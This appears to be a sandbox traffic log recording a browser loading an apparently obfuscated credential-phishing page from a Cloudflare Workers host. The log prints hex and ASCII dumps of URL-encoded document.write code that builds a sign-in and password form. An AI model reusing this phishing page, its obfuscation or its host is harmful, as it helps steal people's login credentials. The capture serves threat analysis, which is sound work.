2024-04-28 23:11:57 UTC	634	IN	HTTP/1.1 404 Not Found Date: Sun, 28 Apr 2024 23:11:57 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close vary: Accept-Encoding x-turbo-charged-by: LiteSpeed Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 398412 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dNZvdN2PmFph2g5zCYD%2BUdT5nsiJQKyxzu%2FbuMUUbcaKhlSUKSZRRNz2BCp0mWXTGlxFirGx6BgOVPBIXxNV5E6hd3iW2o6rtU44vTFDqKNO%2Bc7hPNttF1b1GWvznt69TAlSq5Ig"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87babc008ca92da6-ORD
2024-04-28 23:11:57 UTC	735	IN	Data Raw: 32 36 35 66 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d Data Ascii: 265f<!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=utf-8"><meta http-equiv="Cache-control" content="no-cache"><meta http-equiv="Pragma" content="no-cache"><meta http-equiv="Expires" content="0"><meta nam
2024-04-28 23:11:57 UTC	1369	IN	Data Raw: 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a Data Ascii: } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; }
2024-04-28 23:11:57 UTC	1369	IN	Data Raw: 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 Data Ascii: text-align: center; } .additional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left;
2024-04-28 23:11:57 UTC	1369	IN	Data Raw: 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left;
2024-04-28 23:11:57 UTC	1369	IN	Data Raw: 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f 56 6b 67 4b 58 47 6b 77 59 55 51 48 41 61 4d 2b 79 51 75 6e 42 6d 4e 53 77 62 52 56 59 68 2b 6b 4f 63 67 4d 68 76 52 44 42 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 Data Ascii: tqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0
2024-04-28 23:11:57 UTC	1369	IN	Data Raw: 53 54 4b 77 32 66 71 48 53 47 4d 35 68 42 57 31 49 55 49 30 66 2f 4c 64 4f 4e 74 45 55 4b 58 47 43 39 35 6a 4b 2b 52 67 34 51 42 56 77 4e 6d 6c 65 50 5a 56 6a 54 78 75 6f 32 34 6b 57 4d 72 51 48 67 2f 6e 5a 7a 78 44 71 6d 71 46 52 46 43 37 39 39 2b 64 62 45 69 72 4d 6f 56 45 58 68 56 41 30 37 59 2b 47 57 4e 4d 4f 42 43 78 49 49 70 43 67 43 70 41 58 35 4b 67 48 42 36 49 51 49 4c 48 77 45 33 48 58 6b 32 58 51 56 73 7a 64 53 6b 47 45 43 6a 55 41 42 68 50 4c 4d 64 54 2f 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72 56 30 52 49 71 2f 36 2b 42 49 50 50 56 56 4c 72 Data Ascii: STKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLr
2024-04-28 23:11:57 UTC	1369	IN	Data Raw: 63 74 52 44 43 31 46 73 47 61 51 33 52 74 47 46 66 4c 34 6f 73 33 34 67 36 54 2b 41 6b 41 54 38 34 62 73 30 66 58 32 77 65 53 38 38 58 37 58 36 68 58 52 44 44 52 7a 64 77 48 5a 2f 35 44 32 68 6a 6a 67 68 74 33 4d 62 35 79 31 4e 49 4e 71 2b 62 65 5a 42 75 38 64 38 34 36 35 37 77 50 59 66 4e 38 70 5a 42 63 30 67 2b 4a 4b 69 4b 59 69 4e 72 39 72 34 76 31 5a 72 76 64 62 74 61 7a 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54 54 74 39 47 51 41 36 68 2b 64 2f 31 64 45 35 41 6e 39 47 52 48 35 6f 35 6d 77 49 67 4b 48 76 68 43 42 69 35 6a 36 30 42 63 69 38 6f 65 2b 45 Data Ascii: ctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5y1NINq+beZBu8d84657wPYfN8pZBc0g+JKiKYiNr9r4v1Zrvdbtazp16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+E
2024-04-28 23:11:57 UTC	882	IN	Data Raw: 2f 73 65 63 74 69 6f 6e 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 72 65 61 73 6f 6e 2d 74 65 78 74 22 3e 54 68 65 20 73 65 72 76 65 72 20 63 61 6e 6e 6f 74 20 66 69 6e 64 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 70 61 67 65 3a 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 65 72 5f 6d 69 73 63 6f 6e 66 69 67 75 72 65 64 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 69 6d 61 67 65 22 20 Data Ascii: /section><p class="reason-text">The server cannot find the requested page:</p></div><section class="additional-info"><div class="container"><div class="additional-info-items"><ul><li><img src="/img-sys/server_misconfigured.png" class="info-image"
2024-04-28 23:11:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49770	104.21.55.4	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:57 UTC	626	OUT	GET /favicon.ico HTTP/1.1 Host: vbvfdvdjvv.fyfyvfytvghv.workers.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:11:58 UTC	575	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:11:58 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 9370 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jk9PBRj6S0tq58sOXLOuTO1YfDLGvl%2FgX4l%2BfgL8TxzX1IH9VjHLwcJRELd06WG2X4kEIToitJpdKBQRjYKM%2B9sIOQ6eyIGntmRFFYSTwMOU2Hn2w1yc3a6iHsygkbQmVd%2B0C%2BrCeVeWYYGoXDaKLtFDUsLdog%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87babc03cd4d2334-ORD alt-svc: h3=":443"; ma=86400
2024-04-28 23:11:58 UTC	794	IN	Data Raw: 0a 20 20 20 3c 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 25 32 31 44 4f 43 54 59 50 45 25 32 30 68 74 6d 6c 25 33 45 25 30 41 25 33 43 68 74 6d 6c 25 33 45 25 30 41 25 32 30 25 32 30 25 33 43 68 65 61 64 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 63 68 61 72 73 65 74 25 33 44 25 32 32 75 74 66 2d 38 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 6e 61 6d 65 25 33 44 25 32 32 76 69 65 77 70 6f 72 74 25 32 32 25 32 30 63 6f 6e 74 65 6e 74 25 33 44 25 32 32 77 69 64 74 68 25 33 44 64 65 76 69 63 65 2d 77 69 64 74 68 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 74 Data Ascii: <<script>...document.write(unescape("%3C%21DOCTYPE%20html%3E%0A%3Chtml%3E%0A%20%20%3Chead%3E%0A%20%20%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%22%3E%0A%20%20%20%20%3Ct
2024-04-28 23:11:58 UTC	1369	IN	Data Raw: 72 64 65 72 2d 62 6f 74 74 6f 6d 25 33 41 25 32 30 31 70 78 25 32 30 73 6f 6c 69 64 25 32 30 25 32 33 39 39 39 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 31 30 30 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 70 61 64 64 69 6e 67 25 33 41 25 32 30 35 70 78 25 33 42 25 30 41 25 32 30 25 32 30 66 6f 6e 74 2d 73 69 7a 65 25 33 41 25 32 30 31 36 70 78 25 33 42 25 30 41 25 32 30 25 32 30 6f 75 74 6c 69 6e 65 25 33 41 25 32 30 6e 6f 6e 65 25 33 42 25 30 41 25 37 44 25 30 41 2e 66 6f 72 6d 61 6c 25 37 42 25 30 41 25 32 30 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 25 33 41 25 32 30 25 32 33 66 66 66 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 32 35 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 25 33 Data Ascii: rder-bottom%3A%201px%20solid%20%23999%3B%0A%20%20width%3A%20100%25%3B%0A%20%20padding%3A%205px%3B%0A%20%20font-size%3A%2016px%3B%0A%20%20outline%3A%20none%3B%0A%7D%0A.formal%7B%0A%20%20background%3A%20%23fff%3B%0A%20%20width%3A%2025%25%3B%0A%20%20margin%3
2024-04-28 23:11:58 UTC	1369	IN	Data Raw: 30 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 33 32 70 78 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 68 65 69 67 68 74 25 33 41 25 32 30 33 33 70 78 25 33 42 25 30 41 25 37 44 25 30 41 2e 6f 70 74 69 6f 6e 73 25 37 42 25 30 41 25 32 30 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 25 33 41 25 32 30 25 32 33 66 66 66 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 33 30 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 25 33 41 25 32 30 61 75 74 6f 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 2d 74 6f 70 25 33 41 25 32 30 32 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 62 6f 78 2d 73 68 61 64 6f 77 25 33 41 30 25 32 30 32 70 78 25 32 30 36 70 78 25 32 30 72 67 62 25 32 38 30 25 32 30 30 25 32 30 30 25 Data Ascii: 0%20%20width%3A%2032px%3B%0A%20%20%20%20height%3A%2033px%3B%0A%7D%0A.options%7B%0A%20%20background%3A%20%23fff%3B%0A%20%20width%3A%2030%25%3B%0A%20%20margin%3A%20auto%3B%0A%20%20margin-top%3A%202%25%3B%0A%20%20box-shadow%3A0%202px%206px%20rgb%280%200%200%
2024-04-28 23:11:58 UTC	1369	IN	Data Raw: 5f 6c 6f 67 6f 5f 65 65 35 63 38 64 39 66 62 36 32 34 38 63 39 33 38 66 64 30 64 63 31 39 33 37 30 65 39 30 62 64 2e 73 76 67 25 32 32 25 32 30 61 6c 74 25 33 44 25 32 32 25 32 32 25 33 45 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 73 69 67 6e 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 70 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 6d 61 69 6c 25 32 32 25 33 45 25 33 43 2f 70 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 68 31 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 73 69 6e 25 32 32 25 33 45 53 69 Data Ascii: _logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg%22%20alt%3D%22%22%3E%0A%0A%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22sign%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cp%20class%3D%22mail%22%3E%3C/p%3E%0A%20%20%20%20%20%20%20%20%20%20%3Ch1%20class%3D%22sin%22%3ESi
2024-04-28 23:11:58 UTC	1369	IN	Data Raw: 6e 25 32 30 74 79 70 65 25 33 44 25 32 32 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 6e 65 78 74 25 32 32 25 33 45 4e 65 78 74 25 33 43 2f 62 75 74 74 6f 6e 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 62 75 74 74 6f 6e 25 32 30 74 79 70 65 25 33 44 25 32 32 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 70 65 73 74 25 32 32 25 33 45 4e 65 78 74 25 33 43 2f 62 75 74 74 6f 6e 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 64 69 76 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 62 72 25 33 45 25 33 43 62 72 25 33 45 25 33 43 62 72 25 33 45 25 30 41 25 32 30 25 32 30 25 Data Ascii: n%20type%3D%22%22%20class%3D%22next%22%3ENext%3C/button%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cbutton%20type%3D%22%22%20class%3D%22pest%22%3ENext%3C/button%3E%0A%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%3Cbr%3E%3Cbr%3E%3Cbr%3E%0A%20%20%
2024-04-28 23:11:58 UTC	1369	IN	Data Raw: 25 32 38 25 32 37 2e 6d 61 69 6c 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 6e 6f 61 63 63 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 6e 6f 61 63 63 63 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 63 72 65 61 74 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 63 72 65 61 74 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 62 75 74 74 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e Data Ascii: %28%27.mail%27%29%0A%20%20%20%20%20%20const%20noacc%20%3D%20document.querySelector%28%27.noaccc%27%29%0A%20%20%20%20%20%20const%20creat%20%3D%20document.querySelector%28%27.creat%27%29%0A%20%20%20%20%20%20const%20butt%20%3D%20document.querySelector%28%27.
2024-04-28 23:11:58 UTC	1369	IN	Data Raw: 32 30 25 32 30 70 77 64 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 30 25 33 44 25 32 30 31 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 30 41 25 30 41 25 32 30 25 32 30 62 75 74 74 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 25 32 38 25 32 37 63 6c 69 63 6b 25 32 37 25 32 43 25 32 30 25 32 38 25 32 39 25 33 44 25 33 45 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 7a 69 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 30 25 33 44 25 32 30 25 32 37 62 6c 6f 63 6b 25 32 37 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 7a 69 70 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 30 25 33 44 25 32 30 31 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 Data Ascii: 20%20pwd.style.opacity%20%3D%2010%0A%20%20%20%20%20%20%7D%29%0A%0A%20%20buttA.addEventListener%28%27click%27%2C%20%28%29%3D%3E%7B%0A%20%20%20%20zip.style.display%20%3D%20%27block%27%0A%20%20%20%20zip.style.opacity%20%3D%2010%0A%20%20%20%20%20%20%20%20%20%
2024-04-28 23:11:58 UTC	362	IN	Data Raw: 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 43 25 32 30 65 72 72 6f 72 25 32 30 25 33 44 25 33 45 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 61 6c 65 72 74 25 32 38 25 32 32 4d 65 73 73 61 67 65 25 32 30 6e 6f 74 25 32 30 73 65 6e 74 25 32 32 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 25 32 38 65 72 72 6f 72 25 32 39 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 Data Ascii: 0%20%20%20%20%7D%2C%20error%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20alert%28%22Message%20not%20sent%22%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20console.log%28error%29%0A%0A%20%20%20%20%20%20%20%20%20%20%7D%29%0A%20%20%20%20%20%20%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49771	104.21.55.4	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:58 UTC	370	OUT	GET /favicon.ico HTTP/1.1 Host: vbvfdvdjvv.fyfyvfytvghv.workers.dev Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:11:58 UTC	567	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:11:58 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 9370 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NdHjIxgsznsUQaVqEGwUzfoorhgVEG3LJJl4L3j8S1l5WDd37QTZqYJndqRWdqrTce0Zi0D%2BqRliSkz89bdCFzuNYP9d3nWQqjbdI6G0v94nIisCi3P0xxCiimQNCFUDxVUsgLrCzzljOny11F5SOOnXtWstFA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87babc06fd66295c-ORD alt-svc: h3=":443"; ma=86400
2024-04-28 23:11:58 UTC	802	IN	Data Raw: 0a 20 20 20 3c 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 25 32 31 44 4f 43 54 59 50 45 25 32 30 68 74 6d 6c 25 33 45 25 30 41 25 33 43 68 74 6d 6c 25 33 45 25 30 41 25 32 30 25 32 30 25 33 43 68 65 61 64 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 63 68 61 72 73 65 74 25 33 44 25 32 32 75 74 66 2d 38 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 6e 61 6d 65 25 33 44 25 32 32 76 69 65 77 70 6f 72 74 25 32 32 25 32 30 63 6f 6e 74 65 6e 74 25 33 44 25 32 32 77 69 64 74 68 25 33 44 64 65 76 69 63 65 2d 77 69 64 74 68 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 74 Data Ascii: <<script>...document.write(unescape("%3C%21DOCTYPE%20html%3E%0A%3Chtml%3E%0A%20%20%3Chead%3E%0A%20%20%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%22%3E%0A%20%20%20%20%3Ct
